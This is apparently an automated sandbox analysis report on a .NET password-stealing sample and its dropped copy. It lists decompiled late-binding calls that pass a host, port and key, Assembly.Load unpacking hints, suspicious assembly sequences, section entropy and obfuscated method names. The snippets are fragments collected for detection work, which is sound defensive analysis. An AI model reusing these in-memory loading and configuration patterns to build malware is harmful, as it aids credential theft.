Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, Main.cs	.Net Code: InitializeComponent
Source: pNYyTm.exe.1.dr, Main.cs	.Net Code: InitializeComponent
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.cs	.Net Code: JKIbqNsWCmVV7OsXQC3 System.Reflection.Assembly.Load(byte[])
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.cs	.Net Code: JKIbqNsWCmVV7OsXQC3 System.Reflection.Assembly.Load(byte[])
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Messages.cs	.Net Code: Memory
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.cs	.Net Code: JKIbqNsWCmVV7OsXQC3 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 1_2_05960B78 pushfd ; retf	1_2_05960B7C
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_064527EE push es; iretd	15_2_06452860
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06450089 push es; iretd	15_2_06452860
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_064500AA push es; iretd	15_2_06452860
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_064500BF push es; iretd	15_2_06452860
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_0645014B push es; iretd	15_2_06452860
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06450133 push es; iretd	15_2_06452860
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06452C25 push es; ret	15_2_06452C3C
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06452C3D push es; retf	15_2_06452D10
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06450B78 pushfd ; retf	15_2_06450B7C

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Static PE information: section name: .text entropy: 7.966741357307765
Source: pNYyTm.exe.1.dr	Static PE information: section name: .text entropy: 7.966741357307765

Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, NkEtj4xdihRGcDPjVY.cs	High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, NkEtj4xdihRGcDPjVY.cs	High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, uBRAahgBpjjHAISb74.cs	High entropy of concatenated method names: 'K3FmbY1YJR', 'NXdmPvYn5c', 'hH2mGZk25c', 'YgMm9U3gmc', 'SdWm5WBtpe', 's8Omyf2IGH', 'oN4m6bh4Fj', 'oAfKqiuc5L', 'BHgK2qjDZP', 'JBMK0R6hgB'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, tqIBqAREa8Q6WD82rO.cs	High entropy of concatenated method names: 'oqepaiEAfx', 'O0ppMnjI6s', 'zASpuC6Uch', 'oNgpR5Bfx1', 'zihpLJfF5c', 'bYepcRpBqh', 'byFpH0hPBV', 'kbYpKSa3pa', 'slCpmXx3yQ', 'dY6pDERiVP'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, YrBo172giAk8gnYb5y.cs	High entropy of concatenated method names: 'jLNK9RkpjU', 'jDqK5srB9y', 'YNFKpqQ605', 'mlSKyNMo96', 'pjAK6PEMCb', 'WmGK1gCAG8', 'SvCKoLnoxa', 'YBGKkbZ0J2', 'j66KAEF65s', 'm8DKseDxsn'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, IGROvpvPicb6LXDyW8.cs	High entropy of concatenated method names: 'ToString', 'FRXceWUqUW', 'iWbcNSn1VL', 'WUOcYiy4nW', 'gfMcjosZX0', 'ec0cxHXLSb', 'z0xclwifYa', 'kEYcdamiwS', 'uDgcSWsyri', 'lEscCp8Zuy'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, cIaTm3psrRfHXmD1RG.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oCan0wQVis', 'WZZng9b3wj', 'PWbnzhdT6U', 'MdHP4yE005', 'sclPbT9YI5', 'cdbPnVqbBV', 'SV7PPnnbeL', 'STlOBbsUV3bnGufXjvA'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, y6w8lanDc3YI69TWBE.cs	High entropy of concatenated method names: 'nyeFQhnQR', 'ltLaMv2oY', 'dgdMFTuuV', 'AeX3aUBmU', 'MSRReNyvr', 'pyrhlU4rK', 'hPn8DBe9vHxtYNSPlh', 'qTHsxABh8jSIc25uaK', 'j9oKCMQAL', 'WirDCT9TW'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, fw1IB4uqclhjXGAZvN.cs	High entropy of concatenated method names: 'TJS589BsFN', 'L4a5trh7oD', 'lGG5vR5eHt', 'Ai75Q0fsUC', 'uuR5VZA5yf', 'Ji15XF87XY', 'tJi5qpmvY6', 'gd352If2fk', 'vD750Tpdrt', 'gu45gerD22'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, h8IVSedMFQpixvNuAY.cs	High entropy of concatenated method names: 'Uop19Sv7oZ', 'LCh1p4ygHC', 'wdD16GfXSs', 'mug6gL0SJi', 'QJr6zPMSRV', 'rRL14BF3S1', 'U6g1b2UMtm', 't5e1nGkEWF', 'ner1P78PNi', 'Nmd1GOvoiU'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, rqtLsRCgxuqruShBFT.cs	High entropy of concatenated method names: 'X0i1TxqR1y', 'W281BHixDh', 'd7X1Ff5JqD', 'ucp1a6P03u', 'tSi1OWedCB', 'SNL1MYapKf', 'W7M13s0Vda', 'WFy1u5BEQp', 'Kmp1Rj5jkl', 'e7P1hLmcf6'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, tAI8DEb4LaCGCcG8H2k.cs	High entropy of concatenated method names: 'dugmTYxeIh', 'sLQmBDpYo7', 'pkamF2fsW8', 'j9vmaWG1Iy', 'NpwmOFd8QN', 'irrmM5eVXr', 'b4cm3kDtwx', 's3LmuMG0k7', 'lbqmRgYJJd', 'DjlmhFTXcf'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, plmLCiQhBDHul7rqkX.cs	High entropy of concatenated method names: 'r0JHA2EhL5', 'pc5HstfjIL', 'ToString', 'ivhH9JrlJV', 'YTjH5EvEX2', 'TiaHpWwtHB', 'rKsHymhbFF', 'zGWH66NIxk', 'sGuH1ZFB4s', 'HylHouSDZA'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, OrioeaGQ0PM1syyFSu.cs	High entropy of concatenated method names: 'Wh9b1w1IB4', 'VclbohjXGA', 'lEabA8Q6WD', 'R2rbsOixDH', 'LWfbLWVXXg', 'GQTbcuS7Mq', 'AfX9rYZ8AUDXabg2KR', 'NsuwOIG8KB3G8YZtXj', 'JgqbbYma98', 'WKkbPIUESW'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.cs	High entropy of concatenated method names: 'PaDPJcZBwj', 'm6BP9oHuFS', 'vTrP5EGsJ9', 'DivPprJBnB', 'kCkPyW7e3L', 'DgtP6Iy9MZ', 'UhfP1B1IsJ', 'ig2PodeqMd', 'gLgPkiaAA3', 'HDVPAwpcL7'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, JAtyCrXlg8pJIddapt.cs	High entropy of concatenated method names: 'OqNH2OyRYv', 'Y3iHgyVFry', 'p8DK40Kvm2', 'YfIKbdCXLX', 'uCEHemnlm9', 'itoHwsc5sD', 'lQBHrenmsy', 'MLGH8TxLs8', 'q6fHtUsZFS', 'gSyHvxVuE5'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, PT5L9M0MhqK8Q0f7MB.cs	High entropy of concatenated method names: 'B0SKi9RZAa', 'alYKNVsR4I', 'k6tKYAZiXt', 'WyEKjouC94', 'p0dK8xMR1K', 'xHPKxNP1Vg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, xZ6IqqbPfae5139K1hU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LCoD8uLU3x', 'M3PDt3SWOp', 'sEFDvqlpbx', 'cWxDQkJDKy', 'aaVDVfODUy', 'EJnDXHFVk8', 'GrYDqwbkrk'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, VXgNQTiuS7Mq9yDKkD.cs	High entropy of concatenated method names: 'VIl6J7ofwG', 'EKZ65uyQIS', 'S9M6yIycuy', 'dte61lTb4u', 'C996oyvDog', 'k8jyVMvgw2', 'zByyXhWeBH', 'CpVyqFV9G3', 'Hwny2GwGDL', 'kq1y0OpTMX'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, zV7Ah65u26UDaxa1D3.cs	High entropy of concatenated method names: 'Dispose', 'sZEb08TIDQ', 'fYXnNaZava', 'gtHwwSs2oe', 'egrbgBo17g', 'GAkbz8gnYb', 'ProcessDialogKey', 'gyrn4T5L9M', 'ChqnbK8Q0f', 'nMBnnIBRAa'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, Nv3sLXzlWLSj3jB4F1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0em7AeEpF', 'uXNmLZqKNN', 'JnLmcJvsgi', 'uprmHglUZF', 'vgQmKXd0hK', 'FEXmmalpvG', 'NZlmDerdZd'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, edf7UgrQnKs2ebtqMV.cs	High entropy of concatenated method names: 'BDm7uAuotw', 'vG27RY96eC', 'iW47iBP8JB', 'Lwt7NFCxOA', 'uKN7jqTyEJ', 'Xa07x7hUPt', 'yF47dUmTPc', 'cGG7SrSnk6', 'Vsb7UKZ7CN', 'vdF7enRR2s'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, uBRAahgBpjjHAISb74.cs	High entropy of concatenated method names: 'K3FmbY1YJR', 'NXdmPvYn5c', 'hH2mGZk25c', 'YgMm9U3gmc', 'SdWm5WBtpe', 's8Omyf2IGH', 'oN4m6bh4Fj', 'oAfKqiuc5L', 'BHgK2qjDZP', 'JBMK0R6hgB'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, tqIBqAREa8Q6WD82rO.cs	High entropy of concatenated method names: 'oqepaiEAfx', 'O0ppMnjI6s', 'zASpuC6Uch', 'oNgpR5Bfx1', 'zihpLJfF5c', 'bYepcRpBqh', 'byFpH0hPBV', 'kbYpKSa3pa', 'slCpmXx3yQ', 'dY6pDERiVP'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, YrBo172giAk8gnYb5y.cs	High entropy of concatenated method names: 'jLNK9RkpjU', 'jDqK5srB9y', 'YNFKpqQ605', 'mlSKyNMo96', 'pjAK6PEMCb', 'WmGK1gCAG8', 'SvCKoLnoxa', 'YBGKkbZ0J2', 'j66KAEF65s', 'm8DKseDxsn'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, IGROvpvPicb6LXDyW8.cs	High entropy of concatenated method names: 'ToString', 'FRXceWUqUW', 'iWbcNSn1VL', 'WUOcYiy4nW', 'gfMcjosZX0', 'ec0cxHXLSb', 'z0xclwifYa', 'kEYcdamiwS', 'uDgcSWsyri', 'lEscCp8Zuy'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, cIaTm3psrRfHXmD1RG.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oCan0wQVis', 'WZZng9b3wj', 'PWbnzhdT6U', 'MdHP4yE005', 'sclPbT9YI5', 'cdbPnVqbBV', 'SV7PPnnbeL', 'STlOBbsUV3bnGufXjvA'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, y6w8lanDc3YI69TWBE.cs	High entropy of concatenated method names: 'nyeFQhnQR', 'ltLaMv2oY', 'dgdMFTuuV', 'AeX3aUBmU', 'MSRReNyvr', 'pyrhlU4rK', 'hPn8DBe9vHxtYNSPlh', 'qTHsxABh8jSIc25uaK', 'j9oKCMQAL', 'WirDCT9TW'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, fw1IB4uqclhjXGAZvN.cs	High entropy of concatenated method names: 'TJS589BsFN', 'L4a5trh7oD', 'lGG5vR5eHt', 'Ai75Q0fsUC', 'uuR5VZA5yf', 'Ji15XF87XY', 'tJi5qpmvY6', 'gd352If2fk', 'vD750Tpdrt', 'gu45gerD22'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, h8IVSedMFQpixvNuAY.cs	High entropy of concatenated method names: 'Uop19Sv7oZ', 'LCh1p4ygHC', 'wdD16GfXSs', 'mug6gL0SJi', 'QJr6zPMSRV', 'rRL14BF3S1', 'U6g1b2UMtm', 't5e1nGkEWF', 'ner1P78PNi', 'Nmd1GOvoiU'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, rqtLsRCgxuqruShBFT.cs	High entropy of concatenated method names: 'X0i1TxqR1y', 'W281BHixDh', 'd7X1Ff5JqD', 'ucp1a6P03u', 'tSi1OWedCB', 'SNL1MYapKf', 'W7M13s0Vda', 'WFy1u5BEQp', 'Kmp1Rj5jkl', 'e7P1hLmcf6'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, tAI8DEb4LaCGCcG8H2k.cs	High entropy of concatenated method names: 'dugmTYxeIh', 'sLQmBDpYo7', 'pkamF2fsW8', 'j9vmaWG1Iy', 'NpwmOFd8QN', 'irrmM5eVXr', 'b4cm3kDtwx', 's3LmuMG0k7', 'lbqmRgYJJd', 'DjlmhFTXcf'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, plmLCiQhBDHul7rqkX.cs	High entropy of concatenated method names: 'r0JHA2EhL5', 'pc5HstfjIL', 'ToString', 'ivhH9JrlJV', 'YTjH5EvEX2', 'TiaHpWwtHB', 'rKsHymhbFF', 'zGWH66NIxk', 'sGuH1ZFB4s', 'HylHouSDZA'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, OrioeaGQ0PM1syyFSu.cs	High entropy of concatenated method names: 'Wh9b1w1IB4', 'VclbohjXGA', 'lEabA8Q6WD', 'R2rbsOixDH', 'LWfbLWVXXg', 'GQTbcuS7Mq', 'AfX9rYZ8AUDXabg2KR', 'NsuwOIG8KB3G8YZtXj', 'JgqbbYma98', 'WKkbPIUESW'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.cs	High entropy of concatenated method names: 'PaDPJcZBwj', 'm6BP9oHuFS', 'vTrP5EGsJ9', 'DivPprJBnB', 'kCkPyW7e3L', 'DgtP6Iy9MZ', 'UhfP1B1IsJ', 'ig2PodeqMd', 'gLgPkiaAA3', 'HDVPAwpcL7'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, JAtyCrXlg8pJIddapt.cs	High entropy of concatenated method names: 'OqNH2OyRYv', 'Y3iHgyVFry', 'p8DK40Kvm2', 'YfIKbdCXLX', 'uCEHemnlm9', 'itoHwsc5sD', 'lQBHrenmsy', 'MLGH8TxLs8', 'q6fHtUsZFS', 'gSyHvxVuE5'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, PT5L9M0MhqK8Q0f7MB.cs	High entropy of concatenated method names: 'B0SKi9RZAa', 'alYKNVsR4I', 'k6tKYAZiXt', 'WyEKjouC94', 'p0dK8xMR1K', 'xHPKxNP1Vg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, xZ6IqqbPfae5139K1hU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LCoD8uLU3x', 'M3PDt3SWOp', 'sEFDvqlpbx', 'cWxDQkJDKy', 'aaVDVfODUy', 'EJnDXHFVk8', 'GrYDqwbkrk'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, VXgNQTiuS7Mq9yDKkD.cs	High entropy of concatenated method names: 'VIl6J7ofwG', 'EKZ65uyQIS', 'S9M6yIycuy', 'dte61lTb4u', 'C996oyvDog', 'k8jyVMvgw2', 'zByyXhWeBH', 'CpVyqFV9G3', 'Hwny2GwGDL', 'kq1y0OpTMX'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, zV7Ah65u26UDaxa1D3.cs	High entropy of concatenated method names: 'Dispose', 'sZEb08TIDQ', 'fYXnNaZava', 'gtHwwSs2oe', 'egrbgBo17g', 'GAkbz8gnYb', 'ProcessDialogKey', 'gyrn4T5L9M', 'ChqnbK8Q0f', 'nMBnnIBRAa'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, Nv3sLXzlWLSj3jB4F1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0em7AeEpF', 'uXNmLZqKNN', 'JnLmcJvsgi', 'uprmHglUZF', 'vgQmKXd0hK', 'FEXmmalpvG', 'NZlmDerdZd'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, edf7UgrQnKs2ebtqMV.cs	High entropy of concatenated method names: 'BDm7uAuotw', 'vG27RY96eC', 'iW47iBP8JB', 'Lwt7NFCxOA', 'uKN7jqTyEJ', 'Xa07x7hUPt', 'yF47dUmTPc', 'cGG7SrSnk6', 'Vsb7UKZ7CN', 'vdF7enRR2s'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, uBRAahgBpjjHAISb74.cs	High entropy of concatenated method names: 'K3FmbY1YJR', 'NXdmPvYn5c', 'hH2mGZk25c', 'YgMm9U3gmc', 'SdWm5WBtpe', 's8Omyf2IGH', 'oN4m6bh4Fj', 'oAfKqiuc5L', 'BHgK2qjDZP', 'JBMK0R6hgB'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, tqIBqAREa8Q6WD82rO.cs	High entropy of concatenated method names: 'oqepaiEAfx', 'O0ppMnjI6s', 'zASpuC6Uch', 'oNgpR5Bfx1', 'zihpLJfF5c', 'bYepcRpBqh', 'byFpH0hPBV', 'kbYpKSa3pa', 'slCpmXx3yQ', 'dY6pDERiVP'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, YrBo172giAk8gnYb5y.cs	High entropy of concatenated method names: 'jLNK9RkpjU', 'jDqK5srB9y', 'YNFKpqQ605', 'mlSKyNMo96', 'pjAK6PEMCb', 'WmGK1gCAG8', 'SvCKoLnoxa', 'YBGKkbZ0J2', 'j66KAEF65s', 'm8DKseDxsn'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, IGROvpvPicb6LXDyW8.cs	High entropy of concatenated method names: 'ToString', 'FRXceWUqUW', 'iWbcNSn1VL', 'WUOcYiy4nW', 'gfMcjosZX0', 'ec0cxHXLSb', 'z0xclwifYa', 'kEYcdamiwS', 'uDgcSWsyri', 'lEscCp8Zuy'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, cIaTm3psrRfHXmD1RG.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oCan0wQVis', 'WZZng9b3wj', 'PWbnzhdT6U', 'MdHP4yE005', 'sclPbT9YI5', 'cdbPnVqbBV', 'SV7PPnnbeL', 'STlOBbsUV3bnGufXjvA'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, y6w8lanDc3YI69TWBE.cs	High entropy of concatenated method names: 'nyeFQhnQR', 'ltLaMv2oY', 'dgdMFTuuV', 'AeX3aUBmU', 'MSRReNyvr', 'pyrhlU4rK', 'hPn8DBe9vHxtYNSPlh', 'qTHsxABh8jSIc25uaK', 'j9oKCMQAL', 'WirDCT9TW'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, fw1IB4uqclhjXGAZvN.cs	High entropy of concatenated method names: 'TJS589BsFN', 'L4a5trh7oD', 'lGG5vR5eHt', 'Ai75Q0fsUC', 'uuR5VZA5yf', 'Ji15XF87XY', 'tJi5qpmvY6', 'gd352If2fk', 'vD750Tpdrt', 'gu45gerD22'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, h8IVSedMFQpixvNuAY.cs	High entropy of concatenated method names: 'Uop19Sv7oZ', 'LCh1p4ygHC', 'wdD16GfXSs', 'mug6gL0SJi', 'QJr6zPMSRV', 'rRL14BF3S1', 'U6g1b2UMtm', 't5e1nGkEWF', 'ner1P78PNi', 'Nmd1GOvoiU'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, rqtLsRCgxuqruShBFT.cs	High entropy of concatenated method names: 'X0i1TxqR1y', 'W281BHixDh', 'd7X1Ff5JqD', 'ucp1a6P03u', 'tSi1OWedCB', 'SNL1MYapKf', 'W7M13s0Vda', 'WFy1u5BEQp', 'Kmp1Rj5jkl', 'e7P1hLmcf6'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, tAI8DEb4LaCGCcG8H2k.cs	High entropy of concatenated method names: 'dugmTYxeIh', 'sLQmBDpYo7', 'pkamF2fsW8', 'j9vmaWG1Iy', 'NpwmOFd8QN', 'irrmM5eVXr', 'b4cm3kDtwx', 's3LmuMG0k7', 'lbqmRgYJJd', 'DjlmhFTXcf'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, plmLCiQhBDHul7rqkX.cs	High entropy of concatenated method names: 'r0JHA2EhL5', 'pc5HstfjIL', 'ToString', 'ivhH9JrlJV', 'YTjH5EvEX2', 'TiaHpWwtHB', 'rKsHymhbFF', 'zGWH66NIxk', 'sGuH1ZFB4s', 'HylHouSDZA'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, OrioeaGQ0PM1syyFSu.cs	High entropy of concatenated method names: 'Wh9b1w1IB4', 'VclbohjXGA', 'lEabA8Q6WD', 'R2rbsOixDH', 'LWfbLWVXXg', 'GQTbcuS7Mq', 'AfX9rYZ8AUDXabg2KR', 'NsuwOIG8KB3G8YZtXj', 'JgqbbYma98', 'WKkbPIUESW'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.cs	High entropy of concatenated method names: 'PaDPJcZBwj', 'm6BP9oHuFS', 'vTrP5EGsJ9', 'DivPprJBnB', 'kCkPyW7e3L', 'DgtP6Iy9MZ', 'UhfP1B1IsJ', 'ig2PodeqMd', 'gLgPkiaAA3', 'HDVPAwpcL7'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, JAtyCrXlg8pJIddapt.cs	High entropy of concatenated method names: 'OqNH2OyRYv', 'Y3iHgyVFry', 'p8DK40Kvm2', 'YfIKbdCXLX', 'uCEHemnlm9', 'itoHwsc5sD', 'lQBHrenmsy', 'MLGH8TxLs8', 'q6fHtUsZFS', 'gSyHvxVuE5'
